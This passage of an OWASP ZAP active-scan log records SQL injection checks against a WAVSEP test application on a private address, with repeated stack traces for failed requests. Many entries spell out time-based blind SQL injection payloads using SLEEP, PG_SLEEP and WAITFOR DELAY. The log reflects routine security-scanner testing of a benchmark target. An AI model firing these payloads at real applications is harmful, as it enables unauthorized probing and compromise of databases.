org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962838 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND (SELECT * FROM (SELECT(SLEEP(5)))JcAE)-- JAwJ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND (SELECT * FROM (SELECT(SLEEP(5)))JcAE)-- JAwJ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962839 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND 2477=(SELECT 2477 FROM PG_SLEEP(5)) AND (2143=2143] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND 2477=(SELECT 2477 FROM PG_SLEEP(5)) AND (2143=2143 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962841 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 1446=(SELECT 1446 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 1446=(SELECT 1446 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962843 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND 8113=(SELECT 8113 FROM PG_SLEEP(5)) AND ('PKxF'='PKxF] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND 8113=(SELECT 8113 FROM PG_SLEEP(5)) AND ('PKxF'='PKxF at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962844 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND 9375=(SELECT 9375 FROM PG_SLEEP(5)) AND 'JNVj'='JNVj] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND 9375=(SELECT 9375 FROM PG_SLEEP(5)) AND 'JNVj'='JNVj at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962845 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND 9377=(SELECT 9377 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND 9377=(SELECT 9377 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962846 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 7916=(SELECT 7916 FROM PG_SLEEP(5))-- ocQB] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 7916=(SELECT 7916 FROM PG_SLEEP(5))-- ocQB at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962848 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (8126=8126] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (8126=8126 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962849 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962851 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('nFkZ'='nFkZ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('nFkZ'='nFkZ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962852 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'jHyV'='jHyV] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'jHyV'='jHyV at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962853 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962854 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- rrLw] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- rrLw at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at 